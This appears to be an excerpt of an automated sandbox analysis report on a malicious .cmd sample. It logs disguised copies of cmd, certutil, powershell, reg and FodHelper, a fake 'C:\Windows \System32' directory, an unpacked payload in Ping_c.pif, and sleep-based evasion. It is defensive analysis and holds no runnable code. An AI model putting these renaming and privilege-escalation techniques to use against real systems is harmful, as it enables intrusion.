Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: ???2.dll (3 consecutive loads)
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: ??.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: ???.dll (3 consecutive loads)
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: ??.dll (2 consecutive loads)
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: ??????s.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: ??????s?s.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: ??????s.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: ??.dll (6 consecutive loads)
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: mswsock.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: iphlpapi.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: winnsi.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: ??.dll (39 consecutive loads)
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: dnsapi.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: rasadhlp.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: fwpuclnt.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: ??.dll (6 consecutive loads)
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: winhttpcom.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: ??.dll (4 consecutive loads)
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: webio.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: schannel.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: mskeyprotect.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: ntasn1.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: ncrypt.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: ncryptsslp.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: rsaenh.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: cryptbase.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: gpapi.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: dpapi.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: ??.dll (2 consecutive loads)
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: mlang.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: ??.dll (28 consecutive loads)
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: ???y.dll (3 consecutive loads)
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: ??.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: ????.dll (3 consecutive loads)
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: ??.dll (2 consecutive loads)
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: ???2.dll (3 consecutive loads)
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: ??.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: ???.dll (3 consecutive loads)
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: ??.dll (2 consecutive loads)
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: ??????s.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: ??????s?s.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: ??????s.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: ??.dll (54 consecutive loads)
Source: C:\Users\Public\xkn.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\Public\xkn.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows \System32\per.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociations
Source: rPO767575.cmd | Static file information: File size 4230931 > 1048576
        Source: Binary string: FodHelper.pdb source: extrac32.exe, 0000000F.00000002.1476976535.0000019BC2D60000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000016.00000000.1518864581.00007FF739D2B000.00000002.00000001.01000000.0000000C.sdmp, per.exe, 00000016.00000002.1531678646.00007FF739D2B000.00000002.00000001.01000000.0000000C.sdmp, per.exe.15.dr
Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000004.00000000.1445144057.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1446065132.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1447868032.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.1458781343.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1459173324.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1464587284.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1469344959.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1465532908.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000002.1473566813.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000000.1469668285.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000E.00000000.1473921005.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000E.00000002.1478186750.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000010.00000002.1506732117.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000010.00000000.1478851202.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000012.00000002.1499793462.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000012.00000000.1498344325.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000014.00000002.1518104695.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000014.00000000.1507039984.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001C.00000000.1541220928.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001C.00000002.1545227076.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000002.1551820937.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000000.1548125938.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000021.00000000.1552277477.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000021.00000002.1552927917.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000022.00000000.1553226732.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000022.00000002.1554180486.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000023.00000000.1554505024.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000023.00000002.1555442519.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe,
        Source: Binary string: powershell.pdbUGP source: xkn.exe, 00000011.00000000.1479565533.00007FF6BB8EA000.00000002.00000001.01000000.00000007.sdmp, xkn.exe.13.dr
        Source: Binary string: certutil.pdb source: kn.exe, 00000009.00000002.1463535859.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1459705858.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000015.00000002.1516633974.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000015.00000000.1507474970.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.7.dr
        Source: Binary string: reg.pdb source: extrac32.exe, 0000000B.00000002.1468605418.0000022844600000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000013.00000002.1499281229.00007FF73A3A0000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 00000013.00000000.1498746952.00007FF73A3A0000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.11.dr
        Source: Binary string: powershell.pdb source: xkn.exe, 00000011.00000000.1479565533.00007FF6BB8EA000.00000002.00000001.01000000.00000007.sdmp, xkn.exe.13.dr
        Source: Binary string: cmd.pdb source: alpha.exe, 00000004.00000000.1445144057.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1446065132.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1447868032.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.1458781343.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1459173324.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1464587284.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1469344959.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1465532908.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000002.1473566813.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000000.1469668285.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000E.00000000.1473921005.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000E.00000002.1478186750.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000010.00000002.1506732117.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000010.00000000.1478851202.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000012.00000002.1499793462.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000012.00000000.1498344325.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000014.00000002.1518104695.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 
00000014.00000000.1507039984.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001C.00000000.1541220928.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001C.00000002.1545227076.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000002.1551820937.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000000.1548125938.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000021.00000000.1552277477.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000021.00000002.1552927917.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000022.00000000.1553226732.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000022.00000002.1554180486.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000023.00000000.1554505024.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000023.00000002.1555442519.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 000
        Source: Binary string: FodHelper.pdbGCTL source: extrac32.exe, 0000000F.00000002.1476976535.0000019BC2D60000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000016.00000000.1518864581.00007FF739D2B000.00000002.00000001.01000000.0000000C.sdmp, per.exe, 00000016.00000002.1531678646.00007FF739D2B000.00000002.00000001.01000000.0000000C.sdmp, per.exe.15.dr
        Source: Binary string: reg.pdbGCTL source: extrac32.exe, 0000000B.00000002.1468605418.0000022844600000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000013.00000002.1499281229.00007FF73A3A0000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 00000013.00000000.1498746952.00007FF73A3A0000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.11.dr
        Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000009.00000002.1463535859.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1459705858.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000015.00000002.1516633974.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000015.00000000.1507474970.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.7.dr

        Data Obfuscation

        Source: C:\Users\Public\Libraries\Ping_c.pif Unpacked PE file: 31.2.Ping_c.pif.2940000.0.unpack
        Source: Yara match File source: 31.2.Ping_c.pif.2940000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match File source: 31.2.Ping_c.pif.2940000.0.unpack, type: UNPACKEDPE
        Source: Yara match File source: 0000001F.00000002.2708904655.0000000002940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: alpha.exe.3.dr Static PE information: 0xE1CBFC53 [Mon Jan 16 09:26:43 2090 UTC]
        Source: C:\Users\Public\Libraries\Ping_c.pif Code function: 31_2_02957CA8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary, 31_2_02957CA8
        Source: alpha.exe.3.dr Static PE information: section name: .didat
        Source: kn.exe.7.dr Static PE information: section name: .didat
        Source: per.exe.15.dr Static PE information: section name: .imrsiv
        Source: C:\Users\Public\kn.exe Code function: 9_2_00007FF607F83668 push rsp; ret 9_2_00007FF607F83669
        Source: C:\Users\Public\Libraries\Ping_c.pif Code function: 31_2_029432FC push eax; ret 31_2_02943338
        Source: C:\Users\Public\Libraries\Ping_c.pif Code function: 31_2_029692FC push 02969367h; ret 31_2_0296935F
        Source: C:\Users\Public\Libraries\Ping_c.pif Code function: 31_2_0295D204 push ecx; mov dword ptr [esp], edx 31_2_0295D209
        Source: C:\Users\Public\Libraries\Ping_c.pif Code function: 31_2_0294635C push 029463B7h; ret 31_2_029463AF
        Source: C:\Users\Public\Libraries\Ping_c.pif Code function: 31_2_0294635A push 029463B7h; ret 31_2_029463AF
        Source: C:\Users\Public\Libraries\Ping_c.pif Code function: 31_2_029690AC push 02969125h; ret 31_2_0296911D
        Source: C:\Users\Public\Libraries\Ping_c.pif Code function: 31_2_029691F8 push 02969288h; ret 31_2_02969280
        Source: C:\Users\Public\Libraries\Ping_c.pif Code function: 31_2_02969144 push 029691ECh; ret 31_2_029691E4
        Source: C:\Users\Public\Libraries\Ping_c.pif Code function: 31_2_02946730 push 02946772h; ret 31_2_0294676A
        Source: C:\Users\Public\Libraries\Ping_c.pif Code function: 31_2_0294672E push 02946772h; ret 31_2_0294676A
        Source: C:\Users\Public\Libraries\Ping_c.pif Code function: 31_2_0294C4E4 push ecx; mov dword ptr [esp], edx 31_2_0294C4E9
        Source: C:\Users\Public\Libraries\Ping_c.pif Code function: 31_2_0294D518 push 0294D544h; ret 31_2_0294D53C
        Source: C:\Users\Public\Libraries\Ping_c.pif Code function: 31_2_0294CB64 push 0294CCEAh; ret 31_2_0294CCE2
        Source: C:\Users\Public\Libraries\Ping_c.pif Code function: 31_2_0294C892 push 0294CCEAh; ret 31_2_0294CCE2
        Source: C:\Users\Public\Libraries\Ping_c.pif Code function: 31_2_02957884 push 02957901h; ret 31_2_029578F9
        Source: C:\Users\Public\Libraries\Ping_c.pif Code function: 31_2_029568BE push 0295696Bh; ret 31_2_02956963
        Source: C:\Users\Public\Libraries\Ping_c.pif Code function: 31_2_029568C0 push 0295696Bh; ret 31_2_02956963
        Source: C:\Users\Public\Libraries\Ping_c.pif Code function: 31_2_02957ED0 push 02957F08h; ret 31_2_02957F00
        Source: C:\Users\Public\Libraries\Ping_c.pif Code function: 31_2_02952ED8 push 02952F4Eh; ret 31_2_02952F46
        Source: C:\Users\Public\Libraries\Ping_c.pif Code function: 31_2_02959E74 push 02959EACh; ret 31_2_02959EA4
        Source: C:\Users\Public\Libraries\Ping_c.pif Code function: 31_2_02952FE4 push 02953031h; ret 31_2_02953029
        Source: C:\Users\Public\Libraries\Ping_c.pif Code function: 31_2_02952FE3 push 02953031h; ret 31_2_02953029
        Source: C:\Users\Public\Libraries\Ping_c.pif Code function: 31_2_0296CF18 push eax; ret 31_2_0296CFE8
        Source: C:\Users\Public\Libraries\Ping_c.pif Code function: 31_2_02967F60 push 02968124h; ret 31_2_0296811C
        Source: C:\Users\Public\Libraries\Ping_c.pif Code function: 31_2_02957C5C push 02957C9Eh; ret 31_2_02957C96
        Source: C:\Users\Public\Libraries\Ping_c.pif Code function: 31_2_02955DF4 push ecx; mov dword ptr [esp], edx 31_2_02955DF6

        Persistence and Installation Behavior

        Source: C:\Users\Public\kn.exe File created: C:\Users\Public\Libraries\Ping_c.pif
        Source: C:\Windows\System32\cmd.exe Executable created and started: C:\Windows \System32\per.exe
        Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\alpha.exe
        Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\kn.exe
        Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\xkn.exe
        Source: C:\Windows\System32\extrac32.exe File created: C:\Windows \System32\per.exe
        Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\ger.exe

        Boot Survival

        Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\alpha.exe
        Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\kn.exe
        Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\xkn.exe
        Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\ger.exe
        Source: C:\Users\Public\Libraries\Ping_c.pif Code function: 31_2_02959EB0 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 31_2_02959EB0
        Source: C:\Users\Public\Libraries\Ping_c.pif Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
        Source: C:\Users\Public\Libraries\Ping_c.pif Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
        Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\alpha.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pif Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        Source: C:\Users\Public\Libraries\Ping_c.pif Code function: 31_2_0295CC94 31_2_0295CC94
        Source: C:\Users\Public\Libraries\Ping_c.pif Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
        Source: c:\users\public\xkn.exe Key value queried: Powershell behavior
        Source: C:\Users\Public\xkn.exe Memory allocated: 223D4DD0000 memory reserve | memory write watch
        Source: C:\Users\Public\xkn.exe Memory allocated: 223D4E20000 memory reserve | memory write watch
        Source: C:\Users\Public\xkn.exe Thread delayed: delay time: 922337203685477
        Source: C:\Users\Public\xkn.exe Window / User API: threadDelayed 2021
        Source: C:\Users\Public\xkn.exe Window / User API: threadDelayed 968
        Source: C:\Users\Public\alpha.exe API coverage: 6.5 %
        Source: C:\Users\Public\alpha.exe API coverage: 6.3 %
        Source: C:\Users\Public\alpha.exe API coverage: 8.6 %
        Source: C:\Users\Public\kn.exe API coverage: 0.8 %
        Source: C:\Windows \System32\per.exe API coverage: 7.1 %
        Source: C:\Users\Public\alpha.exe API coverage: 8.9 %
        Source: C:\Users\Public\alpha.exe API coverage: 9.6 %
        Source: C:\Users\Public\Libraries\Ping_c.pif Code function: 31_2_0295CC94 31_2_0295CC94
        Source: C:\Users\Public\xkn.exe TID: 4472 Thread sleep count: 2021 > 30
        Source: C:\Users\Public\xkn.exe TID: 5316 Thread sleep count: 968 > 30
        Source: C:\Users\Public\xkn.exe TID: 6788 Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
        Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
        Source: C:\Users\Public\Libraries\Ping_c.pif Last function: Thread delayed
        Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF744F12978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, 4_2_00007FF744F12978
        Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF744F1823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, 4_2_00007FF744F1823C
        Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF744F035B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, 4_2_00007FF744F035B8
        Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF744F01560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 4_2_00007FF744F01560
        Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF744F27B4C FindFirstFileW,FindNextFileW,FindClose, 4_2_00007FF744F27B4C
        Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF744F12978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, 5_2_00007FF744F12978
        Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF744F1823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, 5_2_00007FF744F1823C
        Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF744F035B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, 5_2_00007FF744F035B8
        Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF744F01560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 5_2_00007FF744F01560
        Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF744F27B4C FindFirstFileW,FindNextFileW,FindClose, 5_2_00007FF744F27B4C
        Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF744F1823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, 8_2_00007FF744F1823C
        Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF744F12978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, 8_2_00007FF744F12978
        Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF744F035B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, 8_2_00007FF744F035B8
        Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF744F01560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 8_2_00007FF744F01560
        Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF744F27B4C FindFirstFileW,FindNextFileW,FindClose, 8_2_00007FF744F27B4C
        Source: C:\Users\Public\kn.exe Code function: 9_2_00007FF608036F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357, 9_2_00007FF608036F80
        Source: C:\Users\Public\kn.exe Code function: 9_2_00007FF6080310C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357, 9_2_00007FF6080310C4
        Source: C:\Users\Public\kn.exe Code function: 9_2_00007FF608033100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357, 9_2_00007FF608033100
        Source: C:\Users\Public\kn.exe Code function: 9_2_00007FF60803234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose, 9_2_00007FF60803234C
        Source: C:\Users\Public\kn.exe Code function: 9_2_00007FF607FCC6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree, 9_2_00007FF607FCC6F8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080319F8 #359,FindFirstFileW,FindNextFileW,FindClose,9_2_00007FF6080319F8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608031B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,9_2_00007FF608031B04
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDDBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,9_2_00007FF607FDDBC0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FD5E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,9_2_00007FF607FD5E58
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDB3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,9_2_00007FF607FDB3D8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F9D440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF607F9D440
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDD4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,9_2_00007FF607FDD4A4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608013674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,9_2_00007FF608013674
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_029458B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,31_2_029458B4
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F1823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,35_2_00007FF744F1823C
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F12978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,35_2_00007FF744F12978
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F035B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,35_2_00007FF744F035B8
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F01560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,35_2_00007FF744F01560
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F27B4C FindFirstFileW,FindNextFileW,FindClose,35_2_00007FF744F27B4C
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F1823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,38_2_00007FF744F1823C
